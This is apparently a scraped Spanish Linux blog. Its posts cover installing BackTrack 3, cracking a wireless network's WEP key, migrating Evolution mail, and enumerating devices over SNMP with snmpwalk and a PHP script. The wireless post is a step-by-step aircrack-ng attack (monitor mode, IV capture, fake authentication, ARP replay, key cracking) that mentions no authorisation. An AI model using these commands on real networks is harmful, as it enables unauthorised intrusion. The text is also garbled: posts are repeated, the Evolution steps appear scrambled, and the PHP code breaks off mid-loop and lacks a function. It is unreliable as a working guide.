Se supone que hay un Windows en hda1 y empleo el espacio sobrante:
1. Preparar dos particiones:
/ ext3 (5GB)(hda2)
swap (500MB)(hda3)
2. Arrancar el liveCD:
$ mkswap /dev/hda3
$ swapon /dev/hda3
$ mkdir /mnt/bt3
$ mount /dev/hda2 /mnt/bt3
$ cp --preserve -R /{bin,boot,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/bt3
$ mkdir /mnt/bt3/{boot,mnt,proc,sys,tmp}
$ mount --bind /dev/ /mnt/bt3/dev/
$ mount -t proc proc /mnt/bt3/proc
$ cp /boot/vmlinuz /mnt/bt3/boot/
3. Instalar el Lilo:
$ chroot /mnt/bt3/ /bin/bash
$ nano /etc/lilo.conf
Windows:
other=/dev/hda1
label:Windows
table:/dev/hda
lo demas debe ser:
lba32
boot /dev/hda
prompt
timeout=600
change-rules
reset
vga=791
image=/boot/vmlinuz
root=/dev/hda2
label=Backtrack.3
read-only
y ya solo queda:
$ lilo -v
5 Sept 2008
5 Aug 2008
Auditoría wireless
Supongamos que quiero auditar la seguridad de un acceso wireless. Vale. Y supongamos que tengo el indispensable Backtrack. Vale. Pues manos a la obra:
1. Abrir consola: $ kismet -c rt2500,ra0,ralink
y la opción L para bloquear en el canal deseado.
2. Para poner en modo monitor: $ airmon-ng start ra0
3. $ airodump-ng --channel (8) --ivs --write /mnt/hda5/casa/ivs/volcado01
4. Otra consola: $ aireplay-ng -1 0 -e (WLAN_00) ra0 (-a BSSID -h mi_BSSID)
5. Otra consola: $ aireplay-ng -3 -e (WLAN_00) ra0 (-b BSSID -h mi_BSSID)
6. Cuando tenga 30.000 ARP,s, unos 380K de archivo: $ aircrack-ng -s volcado*.ivs
Claro que evidentemente mi tarjeta es una Ralink RT-2500. No debe hacer falta pero por si acaso no funciona se puede actualizar su modulo:
$ ifconfig ra0 down
$ rmmod rt2500
$ wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
$ tar -xvzf rt2500-cvs-daily.tar.gz
$ cd rt2500-cvs-*/Module
$ make && make install
$ modprobe rt2500
1. Abrir consola: $ kismet -c rt2500,ra0,ralink
y la opción L para bloquear en el canal deseado.
2. Para poner en modo monitor: $ airmon-ng start ra0
3. $ airodump-ng --channel (8) --ivs --write /mnt/hda5/casa/ivs/volcado01
4. Otra consola: $ aireplay-ng -1 0 -e (WLAN_00) ra0 (-a BSSID -h mi_BSSID)
5. Otra consola: $ aireplay-ng -3 -e (WLAN_00) ra0 (-b BSSID -h mi_BSSID)
6. Cuando tenga 30.000 ARP,s, unos 380K de archivo: $ aircrack-ng -s volcado*.ivs
Claro que evidentemente mi tarjeta es una Ralink RT-2500. No debe hacer falta pero por si acaso no funciona se puede actualizar su modulo:
$ ifconfig ra0 down
$ rmmod rt2500
$ wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
$ tar -xvzf rt2500-cvs-daily.tar.gz
$ cd rt2500-cvs-*/Module
$ make && make install
$ modprobe rt2500
26 Sept 2007
Migrar correo Evolution
Acabo de volver (otra vez!!) a cambiar de distribución Linux en mi viejo ordenador y me he pasado de la Ubuntu Feisty a la PCLinuxOS. Uno de los retos ha sido migrar el correo de Evolution y la verdad es que para hacerlo realmente bien, es decir, que no haya que configurar a mano otra vez las cuentas, he tenido que buscar un poco.
La solución, y de verdad que funciona, es ejecutar lo siguiente en línea de comandos:
En el sistema a reemplazar:
En el sistema nuevo con Evolution ya instalado:
Copia los dos archivos generados en el paso anterior a tu HOME y
Al iniciar Evolution tienes todo tu correo y además las cuentas ya configuradas como estaban.
La solución, y de verdad que funciona, es ejecutar lo siguiente en línea de comandos:
En el sistema a reemplazar:
$ gconftool-2 --shutdownPor supuesto copia los dos archivos creados a un sitio a salvo.
$ evolution --force-shutdown
$ cd $HOME
$ tar czf evolution-backup.tar.gz .evolution .gnome2_private/Evolution
$ gconftool-2 --dump /apps/evolution > evolution_setting.xml
En el sistema nuevo con Evolution ya instalado:
Copia los dos archivos generados en el paso anterior a tu HOME y
$ gconftool-2 --shutdown
$ evolution --force-shutdown
$ tar xzf evolution-backup.tar.gz
$ gconftool-2 --unload evolution_setting.xml
$ gconftool-2 --load evolution_setting.xml
Al iniciar Evolution tienes todo tu correo y además las cuentas ya configuradas como estaban.
31 Jul 2007
Sobre SNMP
SNMP es un protocolo de red que permite obtener una gran cantidad de información del dispositivo que lo tenga activo. Actualmente cualquier dispositivo con una interfaz de red cuenta con la posibilidad de activar un demonio SNMP que permita al administrador acceder a la información del mismo e incluso modificarla de forma remota.
Para los sistemas Linux basta con hacer:
snmpwalk -Os -v2c -c public ip_del_dispositivo > ip_del_dispositivo.walk
Es conveniente redirigir la salida a un fichero por la enorme cantidad de información que se recibe.
Como cosa curiosa he comprobado que obtengo más información si empleo un punto como OID. Suponía que snmpwalk sin OID devolvería todo el árbol completo ¿?.
snmpwalk -Os -v2c -c public ip_del_dispositivo . > ip_del_dispositivo.walk
Bajo Windows se puede emplear un equivalente mediante PHP. Una vez bajado y descomprimido en
C:\PHP
Hay que modificar el php.ini:
- Descomentar php_snmp.dll
- Descomentar php_sockets.dll
- Hacer extensión_dir=”c:\php\ext”
Añadir en variables de entorno de sistema el path: c:\php
Añadir en variables de entorno de sistema: mibdirs como c:\php\extras\mibs
En el Notepad creamos y guardamos como snmpwalk_report.php lo siguiente:
#!/usr/bin/php
<?php
$string = "public";
$host = "$argv[1]";
check_snmp($host);
spitinfo($host);
function check_snmp($box) //primero comprueba que el host tiene
//activo snmp
{
$string="public";
$infocheck = @snmpget("$box", "$string", "system.sysDescr.0");
if(! $infocheck)
{
die("SNMP no esta activo en el host: $box\n");
}
else
{
return $infocheck;
}
}
function spitinfo($host)//obtiene y muestra datos de snmp.
{
$string = "public";
$hostinfo = @snmpget("$host","$string","system.sysDescr.0");
list ($k)=array(split(" ", $hostinfo));
$os = $k[0];
$hostname = @snmpget("$host","$string","system.sysName.0");
$user = @snmpget("$host","$string","system.sysContact.0");
$location = @snmpget("$host","$string","system.sysLocation.0");
$macaddr = @snmpget("$host","$string","interfaces.ifTable.ifEntry.ifPhysAddress.2");
$ethstatus = @snmpget("$host","$string","interfaces.ifTable.ifEntry.ifOperStatus.2");
$ipfwd = @snmpget("$host","$string","ip.ipForwarding.0");
$ipaddr = @gethostbyname("$host");
$info=array("Hostname:"=>"$hostname","Contact:"=>"$user",
"Location:"=>"$location","OS:"=>"$os","MAC Address:"=>
"$macaddr","IP Address:"=>"$ipaddr","Network Status:"=>
"$ethstatus",
"Forwarding:"=>"$ipfwd");
echo "\nTCP Port Summary\n";
tabdata($info);
print "\nTCP Port Summary\n";
snmp_portscan($hostname);
echo "\nOtra forma\n";
$a = snmpwalk("127.0.0.1", "public", "system");
for ($i=0; $i$value)
{
if($label){
print "$label\t";
}else{
print "Not Available\t";
}
if($value){
print "$value\n";
}else{
print "Not Available\n";
}
}
}
function snmp_portscan($target)
{
$listen_ports=snmpwalk("$target","public",".1.3.6.1.2.1.6.13.1.3.0.0.0.0");
foreach($listen_ports as $key=>$value)
{
print "TCP Port $value (" . getservbyport($value, 'tcp') . ") listening \n";
}
}?>
Solo hay que hacer en linea de comandos >php snmpwalk_report.php ip_remoto
En la salida hay varios ejemplos de cómo extraer la información, algunos redundantes, pero sirven como ejemplo y modelo.
Como programas gratuitos podemos usar los
Getif en http://www.wtcs.org/snmp4tpc/getif.htm
Y el impagable
Dude en http://wiki.mikrotik.com/wiki/Dude_windows_installation
Para los sistemas Linux basta con hacer:
snmpwalk -Os -v2c -c public ip_del_dispositivo > ip_del_dispositivo.walk
Es conveniente redirigir la salida a un fichero por la enorme cantidad de información que se recibe.
Como cosa curiosa he comprobado que obtengo más información si empleo un punto como OID. Suponía que snmpwalk sin OID devolvería todo el árbol completo ¿?.
snmpwalk -Os -v2c -c public ip_del_dispositivo . > ip_del_dispositivo.walk
Bajo Windows se puede emplear un equivalente mediante PHP. Una vez bajado y descomprimido en
C:\PHP
Hay que modificar el php.ini:
- Descomentar php_snmp.dll
- Descomentar php_sockets.dll
- Hacer extensión_dir=”c:\php\ext”
Añadir en variables de entorno de sistema el path: c:\php
Añadir en variables de entorno de sistema: mibdirs como c:\php\extras\mibs
En el Notepad creamos y guardamos como snmpwalk_report.php lo siguiente:
#!/usr/bin/php
<?php
$string = "public";
$host = "$argv[1]";
check_snmp($host);
spitinfo($host);
function check_snmp($box) //primero comprueba que el host tiene
//activo snmp
{
$string="public";
$infocheck = @snmpget("$box", "$string", "system.sysDescr.0");
if(! $infocheck)
{
die("SNMP no esta activo en el host: $box\n");
}
else
{
return $infocheck;
}
}
function spitinfo($host)//obtiene y muestra datos de snmp.
{
$string = "public";
$hostinfo = @snmpget("$host","$string","system.sysDescr.0");
list ($k)=array(split(" ", $hostinfo));
$os = $k[0];
$hostname = @snmpget("$host","$string","system.sysName.0");
$user = @snmpget("$host","$string","system.sysContact.0");
$location = @snmpget("$host","$string","system.sysLocation.0");
$macaddr = @snmpget("$host","$string","interfaces.ifTable.ifEntry.ifPhysAddress.2");
$ethstatus = @snmpget("$host","$string","interfaces.ifTable.ifEntry.ifOperStatus.2");
$ipfwd = @snmpget("$host","$string","ip.ipForwarding.0");
$ipaddr = @gethostbyname("$host");
$info=array("Hostname:"=>"$hostname","Contact:"=>"$user",
"Location:"=>"$location","OS:"=>"$os","MAC Address:"=>
"$macaddr","IP Address:"=>"$ipaddr","Network Status:"=>
"$ethstatus",
"Forwarding:"=>"$ipfwd");
echo "\nTCP Port Summary\n";
tabdata($info);
print "\nTCP Port Summary\n";
snmp_portscan($hostname);
echo "\nOtra forma\n";
$a = snmpwalk("127.0.0.1", "public", "system");
for ($i=0; $i
{
if($label){
print "$label\t";
}else{
print "Not Available\t";
}
if($value){
print "$value\n";
}else{
print "Not Available\n";
}
}
}
function snmp_portscan($target)
{
$listen_ports=snmpwalk("$target","public",".1.3.6.1.2.1.6.13.1.3.0.0.0.0");
foreach($listen_ports as $key=>$value)
{
print "TCP Port $value (" . getservbyport($value, 'tcp') . ") listening \n";
}
}?>
Solo hay que hacer en linea de comandos >php snmpwalk_report.php ip_remoto
En la salida hay varios ejemplos de cómo extraer la información, algunos redundantes, pero sirven como ejemplo y modelo.
Como programas gratuitos podemos usar los
Getif en http://www.wtcs.org/snmp4tpc/getif.htm
Y el impagable
Dude en http://wiki.mikrotik.com/wiki/Dude_windows_installation
Subscribe to:
Posts (Atom)